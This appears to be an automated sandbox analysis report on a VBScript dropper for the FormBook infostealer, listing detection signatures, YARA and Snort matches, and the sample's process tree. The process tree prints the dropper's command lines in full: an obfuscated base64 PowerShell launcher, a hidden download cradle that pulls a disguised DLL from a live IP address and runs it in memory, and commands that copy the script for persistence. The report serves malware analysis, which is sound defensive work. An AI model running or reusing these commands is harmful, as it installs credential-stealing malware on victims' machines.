Edit tour
Windows
Analysis Report
daveCrpted.vbs
Overview
General Information
Detection
FormBook
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 6884 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\daveC rpted.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 7076 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ iUqm = 'Ww BCAHkAdABl AFsAXQBdAC AAJABEAEwA TAAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAG?? ?ANgA0AFMA dAByAGkAbg BnACgAKABO AG???AdwAt AE8AYgBqAG ???AYwB0AC AATgBlAHQA LgBXAG???A YgBDAGwAaQ BlAG4AdAAp AC4ARABvAH cAbgBsAG8A YQBkAFMAdA ByAGkAbgBn ACgAJwBoAH QAdABwADoA LwAvADIAMA AuADEAMAA2 AC4AMgAzAD IALgA0AC8A ZABsAGwALw AyADYALQAw AD???ALQAy ADAAMgAyAC 0A???wB0AG EAcgB0AF?? ?AcAAuAHAA ZABmACcAKQ ApADsAWwBT AHkAcwB0AG ???AbQAuAE EAcABwAEQA bwBtAGEAaQ BuAF0AOgA6 AEMAdQByAH IAZQBuAHQA RABvAG0AYQ BpAG4ALgBM AG8AYQBkAC gAJABEAEwA TAApAC4ARw BlAHQAVAB5 AHAAZQAoAC cAZABkAHMA YwBmAEkAdg BxAGcAVwAu AEgAbwBOAF kAbABEAFIA TwBMAFAAJw ApAC4ARwBl AHQATQBlAH QAaABvAGQA KAAnAFIAdQ BuACcAKQAu AEkAbgB2AG 8AawBlACgA JABuAH???A bABsACwAIA BbAG8AYgBq AG???AYwB0 AFsAXQBdAC AAKAAnAHQA eAB0AC4Aaw BqAGkAaAB1 AGcAZgBkAH MAdAAvADIA MgAuADcANQ AuADYANQAu ADIALwAvAD oAcAB0AHQA aAAnACkAKQ A=';$OWjux D = [Syste m.Text.Enc oding]::Un icode.GetS tring( [Sy stem.Conve rt]::FromB ase64Strin g( $iUqm.r eplace('?? ?','U') ) );powershe ll.exe -wi ndowstyle hidden -Ex ecutionPol icy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 7100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6384 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - windowstyl e hidden - ExecutionP olicy Byps s -NoProfi le -Comman d "[Byte[] ] $DLL = [ System.Con vert]::Fro mBase64Str ing((New-O bject Net. WebClient) .DownloadS tring('htt p://20.106 .232.4/dll /26-05-202 2-StartUp. pdf'));[Sy stem.AppDo main]::Cur rentDomain .Load($DLL ).GetType( 'ddscfIvqg W.HoNYlDRO LP').GetMe thod('Run' ).Invoke($ null, [obj ect[]] ('t xt.kjihugf dst/22.75. 65.2//:ptt h')) MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 6508 cmdline:
"C:\Window s\System32 \WindowsPo wershell\v 1.0\powers hell.exe" -WindowSty le Hidden Copy-Item -Path *.vb s -Destina tion C:\Pr ogramData\ Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - RegAsm.exe (PID: 6656 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F) - explorer.exe (PID: 684 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - powershell.exe (PID: 6936 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -W indowStyle Hidden St art-Sleep 5;Start-Pr ocess C:\P rogramData \Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 7052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1288 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden Start-Slee p 5 MD5: 95000560239032BC68B4C2FDFCDEF913) - wscript.exe (PID: 4028 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Pr ogramData\ Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 5680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ iUqm = 'Ww BCAHkAdABl AFsAXQBdAC AAJABEAEwA TAAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAG?? ?ANgA0AFMA dAByAGkAbg BnACgAKABO AG???AdwAt AE8AYgBqAG ???AYwB0AC AATgBlAHQA LgBXAG???A YgBDAGwAaQ BlAG4AdAAp AC4ARABvAH cAbgBsAG8A YQBkAFMAdA ByAGkAbgBn ACgAJwBoAH QAdABwADoA LwAvADIAMA AuADEAMAA2 AC4AMgAzAD IALgA0AC8A ZABsAGwALw AyADYALQAw AD???ALQAy ADAAMgAyAC 0A???wB0AG EAcgB0AF?? ?AcAAuAHAA ZABmACcAKQ ApADsAWwBT AHkAcwB0AG ???AbQAuAE EAcABwAEQA bwBtAGEAaQ BuAF0AOgA6 AEMAdQByAH IAZQBuAHQA RABvAG0AYQ BpAG4ALgBM AG8AYQBkAC gAJABEAEwA TAApAC4ARw BlAHQAVAB5 AHAAZQAoAC cAZABkAHMA YwBmAEkAdg BxAGcAVwAu AEgAbwBOAF kAbABEAFIA TwBMAFAAJw ApAC4ARwBl AHQATQBlAH QAaABvAGQA KAAnAFIAdQ BuACcAKQAu AEkAbgB2AG 8AawBlACgA JABuAH???A bABsACwAIA BbAG8AYgBq AG???AYwB0 AFsAXQBdAC AAKAAnAHQA eAB0AC4Aaw BqAGkAaAB1 AGcAZgBkAH MAdAAvADIA MgAuADcANQ AuADYANQAu ADIALwAvAD oAcAB0AHQA aAAnACkAKQ A=';$OWjux D = [Syste m.Text.Enc oding]::Un icode.GetS tring( [Sy stem.Conve rt]::FromB ase64Strin g( $iUqm.r eplace('?? ?','U') ) );powershe ll.exe -wi ndowstyle hidden -Ex ecutionPol icy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6516 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - windowstyl e hidden - ExecutionP olicy Byps s -NoProfi le -Comman d "[Byte[] ] $DLL = [ System.Con vert]::Fro mBase64Str ing((New-O bject Net. WebClient) .DownloadS tring('htt p://20.106 .232.4/dll /26-05-202 2-StartUp. pdf'));[Sy stem.AppDo main]::Cur rentDomain .Load($DLL ).GetType( 'ddscfIvqg W.HoNYlDRO LP').GetMe thod('Run' ).Invoke($ null, [obj ect[]] ('t xt.kjihugf dst/22.75. 65.2//:ptt h')) MD5: 95000560239032BC68B4C2FDFCDEF913) - RegAsm.exe (PID: 3300 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F) - cmmon32.exe (PID: 6076 cmdline:
C:\Windows \SysWOW64\ cmmon32.ex e MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA) - cmd.exe (PID: 6204 cmdline:
/c del "C: \Windows\M icrosoft.N ET\Framewo rk\v4.0.30 319\RegAsm .exe" MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - explorer.exe (PID: 2596 cmdline:
explorer.e xe MD5: AD5296B280E8F522A8A897C96BAB0E1D) - explorer.exe (PID: 4996 cmdline:
"C:\Window s\explorer .exe" /LOA DSAVEDWIND OWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| |
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
| |
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Click to see the 40 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | ||
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| |
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
| |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
Click to see the 51 entries |
⊘No Sigma rule has matched
Timestamp: | 20.106.232.4192.168.2.580497382025011 05/27/22-21:15:31.357258 |
SID: | 2025011 |
Source Port: | 80 |
Destination Port: | 49738 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 20.106.232.4192.168.2.580497782025011 05/27/22-21:16:25.336336 |
SID: | 2025011 |
Source Port: | 80 |
Destination Port: | 49778 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.5118.27.122.21649870802031449 05/27/22-21:19:38.241995 |
SID: | 2031449 |
Source Port: | 49870 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.5118.27.122.21649870802031412 05/27/22-21:19:38.241995 |
SID: | 2031412 |
Source Port: | 49870 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.5118.27.122.21649870802031453 05/27/22-21:19:38.241995 |
SID: | 2031453 |
Source Port: | 49870 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Bad PDF prefix: |